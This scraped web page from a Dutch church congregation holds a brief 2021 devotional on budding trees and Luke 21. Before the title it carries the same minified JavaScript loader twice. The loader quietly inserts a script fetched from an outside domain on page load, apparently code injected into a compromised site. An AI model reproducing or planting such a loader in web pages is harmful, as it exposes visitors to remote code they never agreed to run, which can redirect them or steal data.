;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Knoppen aan de bomen - PKN Damwâld

Knoppen aan de bomen

Gepubliceerd op: vrijdag 12 maart 2021

De lente nadert. De knoppen groeien duidelijk. Hoe lang zal het nog duren? De Here Jezus vertelde eens een gelijkenis: “Kijk naar de vijgenboom en al de andere bomen. Als je ziet dat ze uitlopen, weet je dat de zomer in aantocht is. Zo moeten jullie ook weten, wanneer je die dingen ziet gebeuren, dat het koninkrijk van God nabij is. Ik verzeker jullie: deze generatie zal zeker niet verdwenen zijn wanneer dit alles gebeurt. Hemel en aarde zullen verdwijnen, maar mijn woorden zullen nooit verdwijnen. Pas op dat jullie hart niet afgestompt raakt door de roes en de dronkenschap en de zorgen van het dagelijks leven, zodat die dag jullie overvalt”. (Lucas 21: 29-34)

Als Jezus wijst op “die dingen” die je ziet gebeuren: oorlogen en tekenen die bij het einde van deze tijd horen. Herken je de knoppen van Jezus’ komst in deze tijd? Loop je gevaar afgestompt te raken door het dagelijkse leven en je zorgen? Bid dat je gericht blijft op Hem. Hij komt – laat je niet ontmoedigen.

Ds. G.J. Otter